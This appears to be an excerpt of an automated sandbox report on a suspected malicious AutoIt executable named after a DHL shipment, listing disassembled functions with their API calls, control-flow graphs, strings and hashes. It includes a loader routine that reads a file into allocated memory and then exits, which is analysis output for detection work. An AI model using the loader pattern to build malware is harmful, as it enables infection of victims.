                                                                                        • Instruction ID: 3cfc44c456f6ad3a7cb346c756eff00fe0e7649cc07e892703c5163a7f22a37a
                                                                                        • Opcode Fuzzy Hash: 5bf8b14083bbe9ee8e78da738e651bcc785cb40310fffe8b706b8987e181b5de
                                                                                        • Instruction Fuzzy Hash: 8CC139B1D00229ABDF25DFA5CC81ADEB7BCEF45310F0040AAF609E6151EB309A85DF65
                                                                                        Function 00C03025 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 67windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00C03074
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00C0309E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C030AF
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00C030CC
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C030DC
                                                                                        • LoadIconW.USER32(000000A9), ref: 00C030F2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C03101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 624df892c733336f4b1425966a66ccb3039578f5aa8becf88186135a3781cb33
                                                                                        • Instruction ID: d3b12fd07584f12f36ae73de6b9518a83b4c5885749a6ba021f3605a573174c2
                                                                                        • Opcode Fuzzy Hash: 624df892c733336f4b1425966a66ccb3039578f5aa8becf88186135a3781cb33
                                                                                        • Instruction Fuzzy Hash: F93104B1841309AFEB409FA4E888BCDBBF4FB09324F10412EE580E62A0D7B55582CF95
                                                                                        Function 00C03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00C03074
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00C0309E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C030AF
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00C030CC
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C030DC
                                                                                        • LoadIconW.USER32(000000A9), ref: 00C030F2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C03101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: fe53685160425dd66102b71ebc6995bdb394308f898f2ed93d9c315945fa2016
                                                                                        • Instruction ID: 15c16544e606832ddd4a3ad68e147a7ea5df5d943e956422086bf5fddb5e92f6
                                                                                        • Opcode Fuzzy Hash: fe53685160425dd66102b71ebc6995bdb394308f898f2ed93d9c315945fa2016
                                                                                        • Instruction Fuzzy Hash: 0921D3B1D51218AFEB00DFA4EC89BDDBBF4FB08714F10412AF911A62A0DBB15585CF99
                                                                                        Function 00C0708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00C04706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CC52F8,?,00C037AE,?), ref: 00C04724
                                                                                          • Part of subcall function 00C2050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C07165), ref: 00C2052D
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C071A8
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C3E8C8
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C3E909
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00C3E947
                                                                                        • _wcscat.LIBCMT ref: 00C3E9A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                        • API String ID: 2673923337-2727554177
                                                                                        • Opcode ID: 7f20c7e0226ca5797df29a3a49e589dd690e40825a016e03dabe115cd34a7492
                                                                                        • Instruction ID: a2740bc7a1383b175a842ae0bc3ced6386277da28c857c25ed54177a5ca8f669
                                                                                        • Opcode Fuzzy Hash: 7f20c7e0226ca5797df29a3a49e589dd690e40825a016e03dabe115cd34a7492
                                                                                        • Instruction Fuzzy Hash: DF716C71508311AEC704EF69E981FAFBBE8FF84350F40052EF445872A1EB71A949DB52
                                                                                        Function 00C03A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00C03A50
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00C03A5F
                                                                                        • LoadIconW.USER32(00000063), ref: 00C03A76
                                                                                        • LoadIconW.USER32(000000A4), ref: 00C03A88
                                                                                        • LoadIconW.USER32(000000A2), ref: 00C03A9A
                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C03AC0
                                                                                        • RegisterClassExW.USER32(?), ref: 00C03B16
                                                                                          • Part of subcall function 00C03041: GetSysColorBrush.USER32(0000000F), ref: 00C03074
                                                                                          • Part of subcall function 00C03041: RegisterClassExW.USER32(00000030), ref: 00C0309E
                                                                                          • Part of subcall function 00C03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C030AF
                                                                                          • Part of subcall function 00C03041: InitCommonControlsEx.COMCTL32(?), ref: 00C030CC
                                                                                          • Part of subcall function 00C03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C030DC
                                                                                          • Part of subcall function 00C03041: LoadIconW.USER32(000000A9), ref: 00C030F2
                                                                                          • Part of subcall function 00C03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C03101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: 6ef1dbd76ed86c3f32e83c44bb39472a419eb993cd2f788675d9daedd08d0f3f
                                                                                        • Instruction ID: 05e1983f5e77bbdd55c3145431c6f7cb2a2c450dfb7b65ed4737159664d5ac9a
                                                                                        • Opcode Fuzzy Hash: 6ef1dbd76ed86c3f32e83c44bb39472a419eb993cd2f788675d9daedd08d0f3f
                                                                                        • Instruction Fuzzy Hash: 902106B1D00708AFEB10DFA4EC49F9D7BF4EB08715F10012AE504AA2A1D7B56A90DF94
                                                                                        Function 00C03633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 767 c03633-c03681 769 c036e1-c036e3 767->769 770 c03683-c03686 767->770 769->770 773 c036e5 769->773 771 c036e7 770->771 772 c03688-c0368f 770->772 777 c036ed-c036f0 771->777 778 c3d0cc-c3d0fa call c11070 call c11093 771->778 774 c03695-c0369a 772->774 775 c0374b-c03753 PostQuitMessage 772->775 776 c036ca-c036d2 DefWindowProcW 773->776 780 c036a0-c036a2 774->780 781 c3d154-c3d168 call c62527 774->781 782 c03711-c03713 775->782 783 c036d8-c036de 776->783 784 c036f2-c036f3 777->784 785 c03715-c0373c SetTimer RegisterWindowMessageW 777->785 812 c3d0ff-c3d106 778->812 787 c03755-c0375f call c044a0 780->787 788 c036a8-c036ad 780->788 781->782 805 c3d16e 781->805 782->783 791 c036f9-c0370c KillTimer call c0443a call c03114 784->791 792 c3d06f-c3d072 784->792 785->782 789 c0373e-c03749 CreatePopupMenu 785->789 806 c03764 787->806 794 c036b3-c036b8 788->794 795 c3d139-c3d140 788->795 789->782 791->782 798 c3d074-c3d076 792->798 799 c3d0a8-c3d0c7 MoveWindow 792->799 803 c3d124-c3d134 call c62d36 794->803 804 c036be-c036c4 794->804 795->776 801 c3d146-c3d14f call c57c36 795->801 807 c3d097-c3d0a3 SetFocus 798->807 808 c3d078-c3d07b 798->808 799->782 801->776 803->782 804->776 804->812 805->776 806->782 807->782 808->804 813 c3d081-c3d092 call c11070 808->813 812->776 816 c3d10c-c3d11f call c0443a call c0434a 812->816 813->782 816->776
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00C036D2
                                                                                        • KillTimer.USER32(?,00000001), ref: 00C036FC
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C0371F
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C0372A
                                                                                        • CreatePopupMenu.USER32 ref: 00C0373E
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00C0374D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: b1efd7ffd7d74cd80fd97b326fd76fd503ec1507ad3cb60ff67a42fb01c8e044
                                                                                        • Instruction ID: 27a620ef53a994ce1e2a00e892d5e07c36be73962d1e855521530f9a72ed0b6c
                                                                                        • Opcode Fuzzy Hash: b1efd7ffd7d74cd80fd97b326fd76fd503ec1507ad3cb60ff67a42fb01c8e044
                                                                                        • Instruction Fuzzy Hash: F94145F2210589BBDB249F68ED09F7E379CFB44700F540129F612962E1CA62AF81E765
                                                                                        Function 00C03766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                        • API String ID: 1825951767-3513169116
                                                                                        • Opcode ID: 4bc08007abd534a11c636ef4c4e4fdd7650fc1fb3d3f3aca6666cd134a621dcc
                                                                                        • Instruction ID: c86b3014d0fbec0ccb0132c6e5a4adc7ea34b199b0fb7220c7f88235a284d948
                                                                                        • Opcode Fuzzy Hash: 4bc08007abd534a11c636ef4c4e4fdd7650fc1fb3d3f3aca6666cd134a621dcc
                                                                                        • Instruction Fuzzy Hash: B3A13BB291026D9ACF05EBA4DC91EEEB7B8FF14310F44052AF416A71D1EF746A09DB60
                                                                                        Function 013EC420 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 942 13ec420-13ec4ce call 13e9e40 945 13ec4d5-13ec4fb call 13ed330 CreateFileW 942->945 948 13ec4fd 945->948 949 13ec502-13ec512 945->949 950 13ec64d-13ec651 948->950 954 13ec519-13ec533 VirtualAlloc 949->954 955 13ec514 949->955 952 13ec693-13ec696 950->952 953 13ec653-13ec657 950->953 956 13ec699-13ec6a0 952->956 957 13ec659-13ec65c 953->957 958 13ec663-13ec667 953->958 961 13ec53a-13ec551 ReadFile 954->961 962 13ec535 954->962 955->950 963 13ec6f5-13ec70a 956->963 964 13ec6a2-13ec6ad 956->964 957->958 959 13ec669-13ec673 958->959 960 13ec677-13ec67b 958->960 959->960 967 13ec67d-13ec687 960->967 968 13ec68b 960->968 969 13ec558-13ec598 VirtualAlloc 961->969 970 13ec553 961->970 962->950 965 13ec70c-13ec717 VirtualFree 963->965 966 13ec71a-13ec722 963->966 971 13ec6af 964->971 972 13ec6b1-13ec6bd 964->972 965->966 967->968 968->952 973 13ec59f-13ec5ba call 13ed580 969->973 974 13ec59a 969->974 970->950 971->963 975 13ec6bf-13ec6cf 972->975 976 13ec6d1-13ec6dd 972->976 982 13ec5c5-13ec5cf 973->982 974->950 978 13ec6f3 975->978 979 13ec6df-13ec6e8 976->979 980 13ec6ea-13ec6f0 976->980 978->956 979->978 980->978 983 13ec602-13ec616 call 13ed390 982->983 984 13ec5d1-13ec600 call 13ed580 982->984 990 13ec61a-13ec61e 983->990 991 13ec618 983->991 984->982 992 13ec62a-13ec62e 990->992 993 13ec620-13ec624 CloseHandle 990->993 991->950 994 13ec63e-13ec647 992->994 995 13ec630-13ec63b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013EC4F1
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013EC717
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                        • Instruction ID: 786ce08c12289be25e57765a64c4bfe486ab2b43bd58e68667c19bef268d3af7
                                                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                        • Instruction Fuzzy Hash: 4AA10870E00219EBDB14CFA8C998BEEBBB5BF48318F249559E101BB2C1D775AA40CF54
                                                                                        Function 00C039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1073 c039d5-c03a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C03A03
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C03A24
                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00C03A38
                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00C03A41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: 8dff46dad3f2edb304115c7f91b37aa40660c2707468aa25d701b85b65bc45e4
                                                                                        • Instruction ID: d4b45138fd26d8bdd38382316b98062c792898f2bf1c40af982d96920caa3843
                                                                                        • Opcode Fuzzy Hash: 8dff46dad3f2edb304115c7f91b37aa40660c2707468aa25d701b85b65bc45e4
                                                                                        • Instruction Fuzzy Hash: B0F03A745002907EEB305723EC48F6F3EBDD7C6F50B01002EF900A2170C6712882DAB4
                                                                                        Function 013EC1F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1074 13ec1f0-13ec31b call 13e9e40 call 13ec0e0 CreateFileW 1081 13ec31d 1074->1081 1082 13ec322-13ec332 1074->1082 1083 13ec3d2-13ec3d7 1081->1083 1085 13ec339-13ec353 VirtualAlloc 1082->1085 1086 13ec334 1082->1086 1087 13ec357-13ec36e ReadFile 1085->1087 1088 13ec355 1085->1088 1086->1083 1089 13ec372-13ec3ac call 13ec120 call 13eb0e0 1087->1089 1090 13ec370 1087->1090 1088->1083 1095 13ec3ae-13ec3c3 call 13ec170 1089->1095 1096 13ec3c8-13ec3d0 ExitProcess 1089->1096 1090->1083 1095->1096 1096->1083
                                                                                        APIs
                                                                                          • Part of subcall function 013EC0E0: Sleep.KERNELBASE(000001F4), ref: 013EC0F1
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013EC311
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: 66Q120YBDKN90XBW
                                                                                        • API String ID: 2694422964-1927633842
                                                                                        • Opcode ID: 9c91fe1dceb630b1a35e09a51a46940776e426b006553d3a1eecbb5761d5dcea
                                                                                        • Instruction ID: 1fff76e7ed779731e4f0d3b26fd82b15c5fe643c2db5e022beab9bbba244459b
                                                                                        • Opcode Fuzzy Hash: 9c91fe1dceb630b1a35e09a51a46940776e426b006553d3a1eecbb5761d5dcea
                                                                                        • Instruction Fuzzy Hash: 40518330D14359DAEF11DBA4C818BEEBBB9AF15304F004199E218BB2C0D7B95B45CB65
                                                                                        Function 00C0407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1098 c0407c-c04092 1099 c04098-c040ad call c07a16 1098->1099 1100 c0416f-c04173 1098->1100 1103 c040b3-c040d3 call c07bcc 1099->1103 1104 c3d3c8-c3d3d7 LoadStringW 1099->1104 1107 c3d3e2-c3d3fa call c07b2e call c06fe3 1103->1107 1108 c040d9-c040dd 1103->1108 1104->1107 1117 c040ed-c0416a call c22de0 call c0454e call c22dbc Shell_NotifyIconW call c05904 1107->1117 1120 c3d400-c3d41e call c07cab call c06fe3 call c07cab 1107->1120 1110 c040e3-c040e8 call c07b2e 1108->1110 1111 c04174-c0417d call c08047 1108->1111 1110->1117 1111->1117 1117->1100 1120->1117
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C3D3D7
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • _memset.LIBCMT ref: 00C040FC
                                                                                        • _wcscpy.LIBCMT ref: 00C04150
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C04160
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 3942752672-1585850449
                                                                                        • Opcode ID: acdf2c0c49ff80a9e061f706b376152c78f0471a7f187dc3c9e51b8a2cf3be7c
                                                                                        • Instruction ID: 265607014ada13831774800bb9654336a93204d343768db0206e375fe332444d
                                                                                        • Opcode Fuzzy Hash: acdf2c0c49ff80a9e061f706b376152c78f0471a7f187dc3c9e51b8a2cf3be7c
                                                                                        • Instruction Fuzzy Hash: E231B3B1408705AFD725EB60EC46FDF77E8AF44304F10461EF685920E1DB70A689DB96
                                                                                        Function 00C0686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1133 c0686a-c06891 call c04ddd 1136 c3e031-c3e041 call c6955b 1133->1136 1137 c06897-c068a5 call c04ddd 1133->1137 1141 c3e046-c3e048 1136->1141 1137->1136 1142 c068ab-c068b1 1137->1142 1143 c3e067-c3e0af call c20db6 1141->1143 1144 c3e04a-c3e04d call c04e4a 1141->1144 1146 c3e052-c3e061 call c642f8 1142->1146 1147 c068b7-c068d9 call c06a8c 1142->1147 1153 c3e0b1-c3e0bb 1143->1153 1154 c3e0d4 1143->1154 1144->1146 1146->1143 1156 c3e0cf-c3e0d0 1153->1156 1157 c3e0d6-c3e0e9 1154->1157 1158 c3e0d2 1156->1158 1159 c3e0bd-c3e0cc 1156->1159 1160 c3e260-c3e263 call c22d55 1157->1160 1161 c3e0ef 1157->1161 1158->1157 1159->1156 1164 c3e268-c3e271 call c04e4a 1160->1164 1163 c3e0f6-c3e0f9 call c07480 1161->1163 1167 c3e0fe-c3e120 call c05db2 call c673e9 1163->1167 1171 c3e273-c3e283 call c07616 call c05d9b 1164->1171 1176 c3e122-c3e12f 1167->1176 1177 c3e134-c3e13e call c673d3 1167->1177 1184 c3e288-c3e2b8 call c5f7a1 call c20e2c call c22d55 call c04e4a 1171->1184 1179 c3e227-c3e237 call c0750f 1176->1179 1186 c3e140-c3e153 1177->1186 1187 c3e158-c3e162 call c673bd 1177->1187 1179->1167 1189 c3e23d-c3e25a call c0735d 1179->1189 1184->1171 1186->1179 1196 c3e176-c3e180 call c05e2a 1187->1196 1197 c3e164-c3e171 1187->1197 1189->1160 1189->1163 1196->1179 1203 c3e186-c3e19e call c5f73d 1196->1203 1197->1179 1208 c3e1c1-c3e1c4 1203->1208 1209 c3e1a0-c3e1bf call c07de1 call c05904 1203->1209 1211 c3e1f2-c3e1f5 1208->1211 1212 c3e1c6-c3e1e1 call c07de1 call c06839 call c05904 1208->1212 1233 c3e1e2-c3e1f0 call c05db2 1209->1233 1214 c3e1f7-c3e200 call c5f65e 1211->1214 1215 c3e215-c3e218 call c6737f 1211->1215 1212->1233 1214->1184 1225 c3e206-c3e210 call c20e2c 1214->1225 1222 c3e21d-c3e226 call c20e2c 1215->1222 1222->1179 1225->1167 1233->1222
                                                                                        APIs
                                                                                          • Part of subcall function 00C04DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C04E0F
                                                                                        • _free.LIBCMT ref: 00C3E263
                                                                                        • _free.LIBCMT ref: 00C3E2AA
                                                                                          • Part of subcall function 00C06A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C06BAD
                                                                                        Strings
